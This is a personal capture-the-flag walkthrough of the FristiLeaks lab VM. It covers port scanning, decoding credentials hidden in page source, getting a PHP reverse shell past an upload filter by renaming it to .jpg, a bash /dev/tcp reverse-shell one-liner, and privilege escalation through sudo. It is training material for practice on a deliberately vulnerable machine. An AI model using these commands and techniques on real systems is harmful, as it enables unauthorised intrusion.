Started out with a basic nmap all ports t4 timing and service detection.
nmap -p- -sV -t4 10.0.0.159
Below you can see the full output.
We’ve got Port 80 open time to explore a web app.
So much pink let’s run a nikto and start poking around.
While nikto was running I curled the robot.txt
From that we see the /cola/ /sisi/ /beer/ directories going to those takes me to a Jedi!
I didn’t know what sisi was ?? I did know that beer and cola where drinks though. The webpage said to stay calm and drink fristi so I wonder if /fristi/ exists.
I doubt I need to brute force this. I must have missed something. I went back to the webpage and viewed the source hoping for a hint at a user name or something.
Cool a note from the dev that never got cleaned up for production. It looks like they are using base64 for image encoding. When you Scroll to the bottom theres another message.
We know that the dev was using base64 for images so I use the base64 util from the coreutils gnu package.
Lets open up image.png and see if it decoded into something we can use.
That is a lot of K’s lets see if we can use the user eezeepz and the List of K’s and e’s we just found.
Sweet Logged into the web app lets find a way to get a local shell with that upload button.
Playing with the upload button burnt a lot of my time and I learned a major lesson. I need to drill it into my head to try easy stuff first.
I Ended up spending like an hour researching how to bypass upload filters besides renaming backdoor.php to backdoor.php.jpg I never even tried it because I assumed that it wouldn’t work. I figured Fristileaks was from around 2015 or so and it had to have some sort of new trick to learn. I got mad at myself for not trying it first.
On Kali by default there are several php web shells in the /usr/share/webshells/php directory. You need to go in and change you port and IP on these and then for this particular shell use
cp /usr/share/webshells/php/php-reverse-shell.php webshell.php.jpg this will use the copy command and create a new version with a .jpg extension at the end.
Then upload you webshell with the upload button.
Then browse to /uploads!
Whoops! No Directory indexing so lets try to call the php renamed to jpg manually.
And Lets Check out our listener.
Local Dance! On to enumeration 2.0 for all the priv esc things!
Well no tty shell so we need to spawn one of those. I tried to spawn with bash and vi but neither worked so python it is.
python -c 'import pty; pty.spawn("/bin/sh")
Hmmmmm? What’s wrong with that? Lets see if we can find our python binary as our path looked funky via
Looks like there is one in /usr/bin lets try it this time.
/usr/bin/python2 -c 'import pty; pty.spawn("/bin/sh")
Awesome We should have a full tty shell now.
There is a note in eezeepz home dir from the admin he has privs to certain bins and “be sure to call the full path and place the the commands into the /tmp folder and they will run”
I created a listener and used those binaries to pipe into a bash reverse shell.
/home/admin/echo | bash -i >& /dev/tcp/10.0.0.130/5567 0>&1
So that Got me to be able to poke around /home/admin
I could now see the cronjob and cryptedpass.txt and fristigod with a whoisyourgodnow.txt file ?
Looking at cryptpass.py you can see it does base64 and then rot13. I tried a couple decoders I use frequently but ultimately decided it would just be easier to reverse the python code to reverse the encryption. I looked at the libraries that were imported with the original script to understand everything that was going on and then wrote something quick and dirty.
#!/usr/bin/python import codecs,base64,sys d = codecs.decode('=RFn0AKnlMHMPIzpyuTI0ITG'[::-1], 'rot13') u = base64.b64decode(d) print u
Running my script gets the following output.
sudo -l gave me a dir to a do command script.
The flag for good measure!
Make sure to try the basic stuff first. If anything this box taught me that. Don’t assume the since it looks easy there is going to be an additional layer of difficulty stacked on top of the local shell staring you in the face.
Enumeration is always key!
I had never really had to use sudo -u before handy to know and caused me to read the sudo man page again. I don’t know what I would do without Man pages. Good Documentation and RTFM! Is worth its weight in gold.